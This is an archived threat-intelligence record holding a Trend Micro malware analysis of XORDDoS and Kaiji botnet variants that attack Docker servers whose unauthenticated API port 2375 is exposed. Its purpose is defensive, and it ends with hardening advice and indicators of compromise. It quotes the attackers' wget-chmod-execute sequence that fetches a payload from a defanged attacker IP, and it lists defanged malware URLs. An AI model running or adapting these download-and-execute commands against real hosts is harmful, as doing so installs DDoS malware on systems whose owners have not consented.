{
	"id": "2b22290b-e75b-43ec-a002-ebce3e6c6df8",
	"created_at": "2026-04-06T00:08:27.125915Z",
	"updated_at": "2026-04-10T03:21:45.634001Z",
	"deleted_at": null,
	"sha1_hash": "ddd058fcd38b9bfd468a8bbe98ab083641cc6953",
	"title": "XORDDoS, Kaiji Variants Target Exposed Docker Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 307203,
	"plain_text": "XORDDoS, Kaiji Variants Target Exposed Docker Servers\r\nBy Augusto Remillano II, Patrick Noel Collado, Karen Ivy Titiwa\r\nPublished: 2020-06-22 · Archived: 2026-04-05 22:21:12 UTC\r\nWe have recently detected variants of two existing Linux botnet malware types targeting exposed Docker servers; these are XORDDoS malware (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) and Kaiji DDoS malware (detected by Trend Micro as DDoS.Linux.KAIJI.A).\r\nHaving Docker servers as their target is a new development for both XORDDoS and Kaiji; XORDDoS was known for targeting Linux hosts on cloud systems, while the recently discovered Kaiji was first reported to affect internet of things (IoT) devices. Attackers usually used botnets to perform brute-force attacks after scanning for open Secure Shell (SSH) and Telnet ports. Now, they also searched for Docker servers with exposed ports (2375). Port 2375, one of the two ports the Docker API uses, is for unencrypted and unauthenticated communication.\r\nThere is, however, a notable difference between the two malware variants’ methods of attack. While the XORDDoS attack infiltrated the Docker server to infect all the containers hosted on it, the Kaiji attack deploys its own container that will house its DDoS malware.\r\nThese malware variants facilitate distributed denial of service (DDoS), a type of attack designed to disable, disrupt, or shut down a network, website, or service. This is done by using multiple systems to overwhelm the target system with traffic until it becomes inaccessible to other users.\r\nAnalysis of XORDDoS malware\r\nThe XORDDoS infection started with the attackers searching for hosts with exposed Docker API ports (2375). They then sent a command that listed the containers hosted on the Docker server. 
Afterwards, the attackers executed the following sequence of commands on all containers, infecting all of them with the XORDDoS malware:\r\nwget hxxp://122[.]51[.]133[.]49:10086/VIP -O VIP\r\nchmod 777 VIP\r\n./VIP\r\nThe XORDDoS payload (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) still used the XOR key it used in other recorded attacks, BB2FA36AAA9541F0, to encrypt its strings and to communicate with the command and control (C\u0026C) server. It also created multiple copies of itself inside the machine as a persistence mechanism.\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nPage 1 of 5\n\nFigure 1. Code snippet showing XORDDoS creating multiple copies of itself\r\nThe payload initiated SYN, ACK, and DNS types of DDoS attacks.\r\nFigure 2. Code snippet showing the types of DDoS attack that XORDDoS can launch\r\nIt is also capable of downloading and executing a follow-up malware, or updating itself.\r\nFigure 3. Code snippet showing XORDDoS’ capability to download and update files.\r\nIt gathered the following data, which are relevant to its attempt to initiate a DDoS attack:\r\nCPU Information\r\nMD5 of Running Process\r\nMemory Information\r\nNetwork Speed\r\nPID of Running Process\r\nIt should be noted that most of the behaviors exhibited by this particular XORDDoS variant have already been observed in earlier variants of the malware.\r\nUpon further investigation of the URL linked to the attacker, we found other malware such as Backdoor.Linux.DOFLOO.AB, a variant of the Dofloo/AESDDoS Linux botnet malware that we previously witnessed targeting exposed Docker APIs.\r\nAnalysis of Kaiji malware\r\nSimilar to the XORDDoS malware, Kaiji is now also targeting exposed Docker servers for propagation. 
Its operator also scanned the internet for hosts with exposed port 2375. After finding a target, they pinged the Docker server before deploying a rogue ARM container that executed the Kaiji binary.\r\nThe script 123.sh (detected by Trend Micro as Trojan.SH.KAIJI.A) downloaded and executed the malware payload, linux_arm (detected by Trend Micro as DDoS.Linux.KAIJI.A). Afterwards, the script also removed other Linux binaries that are basic components of the operating system but are not necessary for its DDoS operation.\r\nFigure 4. Query that downloads and executes 123.sh\r\nFigure 5. Code snippet showing the removal of Linux binaries\r\nThe payload linux_arm, which is the Kaiji DDoS malware, initiated the following DDoS attacks:\r\nACK attack\r\nIPS spoof attack\r\nSSH attack\r\nSYN attack\r\nSYNACK attack\r\nTCP flood attack\r\nUDP flood attack\r\nThis malware also gathered the following data, which it can use for the aforementioned attacks:\r\nCPU Information\r\nDirectories\r\nDomain Name\r\nHost IP address\r\nPID of Running Process\r\nURL scheme\r\nDefending Docker servers\r\nAs seen in these findings, threat actors behind malware variants constantly upgrade their creations with new capabilities so that they can deploy their attacks against other entry points. As they are relatively convenient to deploy in the cloud, Docker servers are becoming an increasingly popular option for companies. However, this also makes them an attractive target for cybercriminals who are on the constant lookout for systems that they can exploit.\r\nThese are some recommendations for securing Docker servers:\r\nSecure the container host. Take advantage of monitoring tools, and host containers in a container-focused OS.\r\nSecure the networking environment. 
Use an intrusion prevention system (IPS) and web filtering to provide visibility and observe internal and external traffic.\r\nSecure the management stack. Monitor and secure the container registry and lock down the Kubernetes installation.\r\nSecure the build pipeline. Implement a thorough and consistent access control scheme and install strong endpoint controls.\r\nAdhere to the recommended best practices.\r\nUse security tools to scan and secure containers.\r\nSecurity solutions are recommended for safeguarding Docker servers. Trend Micro™ Hybrid Cloud Security is recommended for automated security and protection for physical, virtual, and cloud workloads. This solution encompasses the following:\r\nTrend Micro Cloud One™ – for comprehensive visibility and protection against threats\r\nTrend Micro Cloud One - Container Security – for automated container image and registry scanning that helps detect threats early on\r\nTrend Micro Cloud One – Workload Security – for protecting new and existing workloads against even unknown threats using techniques such as machine learning and virtual patching\r\nFor security as software: Trend Micro Deep Security™ Software (workload and container security) and Trend Micro Deep Security Smart Check (container image security) for scanning container images and preventing further compromise\r\nIndicators of Compromise\r\nKaiji\r\nFile name | SHA 256 | Trend Micro pattern detection\r\n123.sh | 9301d983e9d8fad3cc205ad67746cd111024daeb4f597a77934c7cfc1328c3d8 | Trojan.SH.KAIJI.A\r\nlinux_arm | d315b83e772dfddbd2783f016c38f021225745eb43c06bbdfd92364f68fa4c56 | DDoS.Linux.KAIJI.A\r\nRelated URLs:\r\nhxxp://62[.]171[.]160[.]189/linux_arm\r\nhxxp://62[.]171[.]160[.]189/11/123.sh\r\nXORDDoS and other malware variants 
found through the same URL\r\nRelated URL:\r\nhxxp://122[.]51[.]133[.]49:10086/VIP\r\nSource: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html"
	],
	"report_names": [
		"xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddd058fcd38b9bfd468a8bbe98ab083641cc6953.pdf",
		"text": "https://archive.orkl.eu/ddd058fcd38b9bfd468a8bbe98ab083641cc6953.txt",
		"img": "https://archive.orkl.eu/ddd058fcd38b9bfd468a8bbe98ab083641cc6953.jpg"
	}
}